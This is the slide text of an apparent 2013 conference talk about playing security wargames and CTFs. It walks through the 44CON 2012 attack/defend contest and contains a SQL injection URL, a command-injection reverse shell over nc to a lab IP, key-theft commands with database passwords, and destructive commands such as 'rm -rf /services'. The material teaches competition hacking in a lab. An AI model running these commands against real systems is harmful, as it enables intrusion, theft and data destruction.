SlideShare una empresa de Scribd logo

Playing CTFs for Fun & Profit

I
impdefined

Presented at BSides London 2013

Tecnología
1 de 119
Playing CTFs for Fun & Profit
Me @impdefined Software developer Know a lot about bugs Trying not to make things worse
Me Playing CTFs for ~2 years CTF team 0xbadf00d Contributor to io.smashthestack.org
You
Wargames & CTFs
Wargames & CTFs – Why? Learning Hands-on experience Legal Fun! (and profit)
Wargames & CTFs – Why?
Wargames
Wargames
Wargames Technical security exercises
Wargames Technical security exercises Hacking challenges
Wargames Technical security exercises Hacking challenges Progress through series of levels No time limits Solo
Wargames - categories Web Binary exploitation Cryptography General design flaws
Wargames - examples
Loaded 1 password hash (FreeBSD MD5 [32/32]) ******* (administrator) guesses: 1 time: 0:00:00:18 100% c/s: 13207 trying: ********
Wargames - experience
Playing wargames I got to: Implement a padding oracle attack against RSA Despair at the state of PHP Implement a CPU timing attack Exploit a kernel stack buffer overflow Create a JS VM for a custom processor architecture Write lots of custom shellcode XOR all the things
Capture the Flag
Capture the Flag Time-limited event to test your skills Team-based Competitive Not “progressive”
CTF types Challenge-based DEF CON quals Ghost In The Shellcode CSAW CTF Attack/defend DEF CON finals 44Con CTF 2012
CTF types Lots of online events ~20 last year mainly challenge-based Live events! 44CON: Lewt RuCTFE: £3,000 Codegate: £11,000
Playing CTF
Capture the flag experience
Capture the flag experience
CTF challenge - jacked
CTF challenge - jacked # nc jacked.final2012.ghostintheshellcode.com 2121 Jack's Blackjack Simulator Blackjack pays 2:1 Dealer must hit soft 17 Single deck, shuffled after every round Enter your name: pwn Your table companions: Player 1 is Tracy with $1332 Player 2 is Grace with $770 Player 3 is Curtis with $1376 Player 4 is Bryan with $1950 You have $1000 Place your bet (zero to exit): $
CTF challenge - jacked $1,000,000,000 will win the game Good random source 32bit seed Player 1 is Tracy with $1332 Player 2 is Grace with $770 Player 3 is Curtis with $1376 Player 4 is Bryan with $1950
CTF challenge - jacked
CTF challenge - Folly Text adventure On winning, enter shellcode Binary is chrooted, make custom code Read “key” file... get another port and binary
CTF challenge - Folly x86_64 x86 ARM ARM Thumb PPC Alpha Cris
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
44CON CTF 2012
44CON CTF 2012 Attack & Defend Provided with: Virtual machine IP address Ranges of target machines
Attack & Defend Kind of like a pentest but more fun I have a plan Recon Harden Write exploits Run riot Get the girl
Recon I'd rather be offline than owned Self-recon Capture traffic Quick nmap of non-player servers
Recon - services
Recon - services
Recon - scoring Packet captures shed some light Regular "scoring rounds“ Every 30 minutes Scoring server stores new keys in services and checks for previous keys
Pastie
Pastie
Pastie
Pastie
Pastie Written in PHP Pastes stored in a MySQL database PHP+MySQL Can you tell what the vuln is yet?
Pastie vulnerability Classic SQL injection
Pastie fix It’s not all pwnpwnpwn Updated code with prepared statements PHP 
Pastie exploit I want keys!
Pastie exploit https://ip/view/%'+and+lang+=+'text'+order+by+ date+desc+--+
Pastie exploit
Pastie exploit – scripted
Mailserver
Mailserver SMTP and POP3 server Keys stored in emails Written in Ruby I don’t know Ruby Only ~500 lines
Mailserver - vulnerability This just interprets provided text as ruby code Time to learn Ruby! ???
Mailserver - vulnerability Looking at the logs... Verify vulnerability
Mailserver - exploitation I'm sure Ruby is lovely... ... but let's just find some code to copy
Mailserver - exploitation
Mailserver - exploitation
Mailserver - scripted
Auth
Auth Listening on port 23500
Auth
Auth Redis wrapper Stores arbitrary strings
Auth vulnerability Source analysis 101
Auth vulnerability
Auth exploitation Classic stack buffer overflow Overwrite return address with any value Pre-auth remote code execution...
Auth exploitation Classic stack buffer overflow Overwrite return address with any value Pre-auth remote code execution... ... noooope.
Auth exploitation
Auth exploitation Put a valid writable address in the pointer Easy if this was a 32bit process 64bit, annoying memory space
Auth exploitation gdb$ info proc map Mapped address spaces: Start Addr End Addr Size Offset objfile 0x400000 0x403000 0x3000 0x0 /services/auth/auth 0x602000 0x603000 0x1000 0x2000 /services/auth/auth 0x603000 0x604000 0x1000 0x3000 /services/auth/auth 0x604000 0x625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
Auth exploitation gdb$ info proc map Mapped address spaces: Start Addr End Addr Size Offset objfile 0x0000000000400000 0x0000000000403000 0x3000 0x0 /services/auth/auth 0x0000000000602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth 0x0000000000603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth 0x0000000000604000 0x0000000000625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall](readonly)
Auth exploitation Time’s up! No remote code execution  Very limited DoS Crash process Restarts automatically
Servicemon
Servicemon
Servicemon
Servicemon
Servicemon Command injection via "filelist" parameter
Servicemon - vulnerability filelist=/services/auth/auth %x(shasum /services/auth/auth) filelist=notafile || id %x(shasum notafile || id)
Servicemon - vulnerability
Servicemon - exploitation Never mind keys, I want a shell contestant@ubuntu:~$ nc -l 31337 -e /bin/sh nc: invalid option -- 'e'
Servicemon - exploitation Stand back... I know bash* rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.75 31337 >/tmp/f http://ip:3000/hash?filelist=notafile||rm%20%2Ftmp %2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20% 2Ftmp%2Ff%7C%2Fbin%2Fsh%20- i%202>%261%7Cnc%20192.168.1.75%203133 7%20>%2Ftmp%2Ff * totally copied from somewhere
Servicemon - exploitation contestant@ubuntu:~$ nc -lv 31337 Connection from 192.168.1.72 port 31337 [tcp/*] accepted $ whoami contestant $ pwd /services/servicemon I got a shell! Now I can have some fun!
Rampage
Rampage
Steal all the keys mysql --user=sinatra --password=44ConCTF servicemon -e "select status from statuses order by created_at desc limit 1;" mysql --user=pastie --password=J@cobsClub$ paste -e "select pastie from pastie order by date desc limit 1;" OUTPUT=redis-cli -r 1 keys * | tail -n 1 redis-cli -r 1 lrange $OUTPUT 0 1
Leave a calling card echo 'Look behind you! A three-headed monkey!' > /services/pastie/.win
Annoy echo exit >> ~/.bashrc rm -rf /services echo 'export PROMPT_COMMAND="cd"' >> ~/.bashrc
Escalation
Escalation Getting keys is fine Getting shells is better Getting root is best
Escalation – the hard way $ find /etc -writable /etc/init/mail.conf /etc/init/auth.conf
Escalation – the hard way USER PID TTY STAT COMMAND root 8680 ? Ss /services/auth/auth
Escalation – the hard way When auth starts we will get a root shell Lame DoS to the rescue! perl -e 'print "auth " . "A"x1100 . "n"' | nc ip 23500 Connection from 192.168.1.73 port 31337 [tcp/*] accepted # whoami root
Escalation – the easy way 220 Mail Service ready (33147) HELO 250 Requested mail action okay, completed EXPN respond(client, %x(whoami)) root
Playing wargames & CTFs
Useful stuff – general Scripting language Hex editor Linux & Windows VMs The linux “file” command
Useful stuff - web Firefox + Firebug + Tamper data php.net
Useful stuff - binary C Disassembler (IDA demo, Hopper)
Useful stuff - CTF Collaboration! Hall.com sync.in Wiki IRC
Wargame recommendations overthewire.org (Natas) Web exploitation io.smasthestack.org Binary exploitation hackthissite.org Web exploitation overthewire.org (Vortex) Binary exploitation overthewire.org (Bandit) "Absolute beginners" (learn how to Linux)
CTF recommendations http://ctftime.org DEF CON CTF June Binary-heavy CSAW CTF “gentle” introduction September
Motivation 44CON Lewt CSAW £600 HitB AMS £1,500 Plaid £2,500 RuCTFE £3,000 PHdays £6,000 Codegate £11,000
Motivation
Questions @impdefined impdefined@0xbadf00d.co.uk

Recomendados

Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
A CTF Hackers Toolbox
A CTF Hackers ToolboxA CTF Hackers Toolbox
A CTF Hackers ToolboxStefan
 
Symfony in microservice architecture
Symfony in microservice architectureSymfony in microservice architecture
Symfony in microservice architectureDaniele D'Angeli
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Accelerating TensorFlow with RDMA for high-performance deep learning
Accelerating TensorFlow with RDMA for high-performance deep learningAccelerating TensorFlow with RDMA for high-performance deep learning
Accelerating TensorFlow with RDMA for high-performance deep learningDataWorks Summit
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Address/Thread/Memory Sanitizer
Address/Thread/Memory SanitizerAddress/Thread/Memory Sanitizer
Address/Thread/Memory SanitizerPlatonov Sergey
 

Recomendados

Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
A CTF Hackers Toolbox
A CTF Hackers ToolboxA CTF Hackers Toolbox
A CTF Hackers ToolboxStefan
 
Symfony in microservice architecture
Symfony in microservice architectureSymfony in microservice architecture
Symfony in microservice architectureDaniele D'Angeli
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Accelerating TensorFlow with RDMA for high-performance deep learning
Accelerating TensorFlow with RDMA for high-performance deep learningAccelerating TensorFlow with RDMA for high-performance deep learning
Accelerating TensorFlow with RDMA for high-performance deep learningDataWorks Summit
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Address/Thread/Memory Sanitizer
Address/Thread/Memory SanitizerAddress/Thread/Memory Sanitizer
Address/Thread/Memory SanitizerPlatonov Sergey
 
CQRS and Event Sourcing in a Symfony application
CQRS and Event Sourcing in a Symfony applicationCQRS and Event Sourcing in a Symfony application
CQRS and Event Sourcing in a Symfony applicationSamuel ROZE
 
Security Onion - Brief
Security Onion - BriefSecurity Onion - Brief
Security Onion - BriefAshley Deuble
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Google Power Searching - 구글 검색 120% 활용하기
Google Power Searching - 구글 검색 120% 활용하기Google Power Searching - 구글 검색 120% 활용하기
Google Power Searching - 구글 검색 120% 활용하기i4uworks
 
Cookie replay attack unit wise presentation
Cookie replay attack unit wise presentationCookie replay attack unit wise presentation
Cookie replay attack unit wise presentationNilu Desai
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Maturity Model of Security Disciplines
Maturity Model of Security Disciplines Maturity Model of Security Disciplines
Maturity Model of Security Disciplines Florian Roth
 
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...Mikhail Egorov
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesChema Alonso
 
실시간 게임 서버 최적화 전략
실시간 게임 서버 최적화 전략실시간 게임 서버 최적화 전략
실시간 게임 서버 최적화 전략YEONG-CHEON YOU
 
Iocp advanced
Iocp advancedIocp advanced
Iocp advancedNam Hyeonuk
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter HimselfSergey Soldatov
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212Florian Roth
 
libuv, NodeJS and everything in between
libuv, NodeJS and everything in betweenlibuv, NodeJS and everything in between
libuv, NodeJS and everything in betweenSaúl Ibarra Corretgé
 
Modern C++의 타입 추론과 람다, 컨셉
Modern C++의 타입 추론과 람다, 컨셉Modern C++의 타입 추론과 람다, 컨셉
Modern C++의 타입 추론과 람다, 컨셉HyunJoon Park
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
Original slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talkOriginal slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talkAarti Parikh
 
소프트웨어 학습 및 자바 웹 개발자 학습 로드맵
소프트웨어 학습 및 자바 웹 개발자 학습 로드맵소프트웨어 학습 및 자바 웹 개발자 학습 로드맵
소프트웨어 학습 및 자바 웹 개발자 학습 로드맵Javajigi Jaesung
 
Playing 44CON CTF for fun and profit
Playing 44CON CTF for fun and profitPlaying 44CON CTF for fun and profit
Playing 44CON CTF for fun and profit44CON
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersYury Chemerkin
 

Más contenido relacionado

La actualidad más candente

CQRS and Event Sourcing in a Symfony application
CQRS and Event Sourcing in a Symfony applicationCQRS and Event Sourcing in a Symfony application
CQRS and Event Sourcing in a Symfony applicationSamuel ROZE
 
Security Onion - Brief
Security Onion - BriefSecurity Onion - Brief
Security Onion - BriefAshley Deuble
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Google Power Searching - 구글 검색 120% 활용하기
Google Power Searching - 구글 검색 120% 활용하기Google Power Searching - 구글 검색 120% 활용하기
Google Power Searching - 구글 검색 120% 활용하기i4uworks
 
Cookie replay attack unit wise presentation
Cookie replay attack unit wise presentationCookie replay attack unit wise presentation
Cookie replay attack unit wise presentationNilu Desai
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Maturity Model of Security Disciplines
Maturity Model of Security Disciplines Maturity Model of Security Disciplines
Maturity Model of Security Disciplines Florian Roth
 
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...Mikhail Egorov
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesChema Alonso
 
실시간 게임 서버 최적화 전략
실시간 게임 서버 최적화 전략실시간 게임 서버 최적화 전략
실시간 게임 서버 최적화 전략YEONG-CHEON YOU
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
 
Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212Florian Roth
 
libuv, NodeJS and everything in between
libuv, NodeJS and everything in betweenlibuv, NodeJS and everything in between
libuv, NodeJS and everything in betweenSaúl Ibarra Corretgé
 
Modern C++의 타입 추론과 람다, 컨셉
Modern C++의 타입 추론과 람다, 컨셉Modern C++의 타입 추론과 람다, 컨셉
Modern C++의 타입 추론과 람다, 컨셉HyunJoon Park
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
 
Original slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talkOriginal slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talkAarti Parikh
 
소프트웨어 학습 및 자바 웹 개발자 학습 로드맵
소프트웨어 학습 및 자바 웹 개발자 학습 로드맵소프트웨어 학습 및 자바 웹 개발자 학습 로드맵
소프트웨어 학습 및 자바 웹 개발자 학습 로드맵Javajigi Jaesung
 

La actualidad más candente (20)

CQRS and Event Sourcing in a Symfony application
CQRS and Event Sourcing in a Symfony applicationCQRS and Event Sourcing in a Symfony application
CQRS and Event Sourcing in a Symfony application
 
Security Onion - Brief
Security Onion - BriefSecurity Onion - Brief
Security Onion - Brief
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple Teaming
 
Google Power Searching - 구글 검색 120% 활용하기
Google Power Searching - 구글 검색 120% 활용하기Google Power Searching - 구글 검색 120% 활용하기
Google Power Searching - 구글 검색 120% 활용하기
 
Cookie replay attack unit wise presentation
Cookie replay attack unit wise presentationCookie replay attack unit wise presentation
Cookie replay attack unit wise presentation
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules Coverage
 
Maturity Model of Security Disciplines
Maturity Model of Security Disciplines Maturity Model of Security Disciplines
Maturity Model of Security Disciplines
 
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
CSRF-уязвимости все еще актуальны: как атакующие обходят CSRF-защиту в вашем ...
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy Queries
 
실시간 게임 서버 최적화 전략
실시간 게임 서버 최적화 전략실시간 게임 서버 최적화 전략
실시간 게임 서버 최적화 전략
 
Iocp advanced
Iocp advancedIocp advanced
Iocp advanced
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
 
Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212Security Analyst Workshop - 20200212
Security Analyst Workshop - 20200212
 
libuv, NodeJS and everything in between
libuv, NodeJS and everything in betweenlibuv, NodeJS and everything in between
libuv, NodeJS and everything in between
 
Modern C++의 타입 추론과 람다, 컨셉
Modern C++의 타입 추론과 람다, 컨셉Modern C++의 타입 추론과 람다, 컨셉
Modern C++의 타입 추론과 람다, 컨셉
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill
 
Original slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talkOriginal slides from Ryan Dahl's NodeJs intro talk
Original slides from Ryan Dahl's NodeJs intro talk
 
소프트웨어 학습 및 자바 웹 개발자 학습 로드맵
소프트웨어 학습 및 자바 웹 개발자 학습 로드맵소프트웨어 학습 및 자바 웹 개발자 학습 로드맵
소프트웨어 학습 및 자바 웹 개발자 학습 로드맵
 

Similar a Playing CTFs for Fun & Profit

Playing 44CON CTF for fun and profit
Playing 44CON CTF for fun and profitPlaying 44CON CTF for fun and profit
Playing 44CON CTF for fun and profit44CON
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersYury Chemerkin
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - RoutersLogicaltrust pl
 
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Nate Lawson
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Poker, packets, pipes and Python
Poker, packets, pipes and PythonPoker, packets, pipes and Python
Poker, packets, pipes and PythonRoger Barnes
 
Defeating the entropy downgrade attack
Defeating the entropy downgrade attackDefeating the entropy downgrade attack
Defeating the entropy downgrade attackSeth Wahle
 
Feb14 successful development
Feb14 successful developmentFeb14 successful development
Feb14 successful developmentConnor McDonald
 
Swift Install Workshop - OpenStack Conference Spring 2012
Swift Install Workshop - OpenStack Conference Spring 2012Swift Install Workshop - OpenStack Conference Spring 2012
Swift Install Workshop - OpenStack Conference Spring 2012Joe Arnold
 
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...Andrew Case
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
The New Systems Performance
The New Systems PerformanceThe New Systems Performance
The New Systems PerformanceBrendan Gregg
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)Alexandre Moneger
 
0x01 - Breaking into Linux VMs for Fun and Profit.pdf
0x01 - Breaking into Linux VMs for Fun and Profit.pdf0x01 - Breaking into Linux VMs for Fun and Profit.pdf
0x01 - Breaking into Linux VMs for Fun and Profit.pdfscribdsituation719
 
AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...
AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...
AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...Amazon Web Services
 
Build Your Own Android Tablet
Build Your Own Android TabletBuild Your Own Android Tablet
Build Your Own Android TabletSGAndroidDevs
 

Similar a Playing CTFs for Fun & Profit (20)

Playing 44CON CTF for fun and profit
Playing 44CON CTF for fun and profitPlaying 44CON CTF for fun and profit
Playing 44CON CTF for fun and profit
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
 
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
 
Da APK al Golden Ticket
Da APK al Golden TicketDa APK al Golden Ticket
Da APK al Golden Ticket
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Poker, packets, pipes and Python
Poker, packets, pipes and PythonPoker, packets, pipes and Python
Poker, packets, pipes and Python
 
Defeating the entropy downgrade attack
Defeating the entropy downgrade attackDefeating the entropy downgrade attack
Defeating the entropy downgrade attack
 
Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers
 
Feb14 successful development
Feb14 successful developmentFeb14 successful development
Feb14 successful development
 
Swift Install Workshop - OpenStack Conference Spring 2012
Swift Install Workshop - OpenStack Conference Spring 2012Swift Install Workshop - OpenStack Conference Spring 2012
Swift Install Workshop - OpenStack Conference Spring 2012
 
amrapali builders@@sub way hacking.pdf
amrapali builders@@sub way hacking.pdfamrapali builders@@sub way hacking.pdf
amrapali builders@@sub way hacking.pdf
 
Hta w22
Hta w22Hta w22
Hta w22
 
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
The New Systems Performance
The New Systems PerformanceThe New Systems Performance
The New Systems Performance
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
 
0x01 - Breaking into Linux VMs for Fun and Profit.pdf
0x01 - Breaking into Linux VMs for Fun and Profit.pdf0x01 - Breaking into Linux VMs for Fun and Profit.pdf
0x01 - Breaking into Linux VMs for Fun and Profit.pdf
 
AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...
AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...
AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...
 
Build Your Own Android Tablet
Build Your Own Android TabletBuild Your Own Android Tablet
Build Your Own Android Tablet
 

Último

Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
The Ultimate Guide to Choosing WordPress Pros and Cons
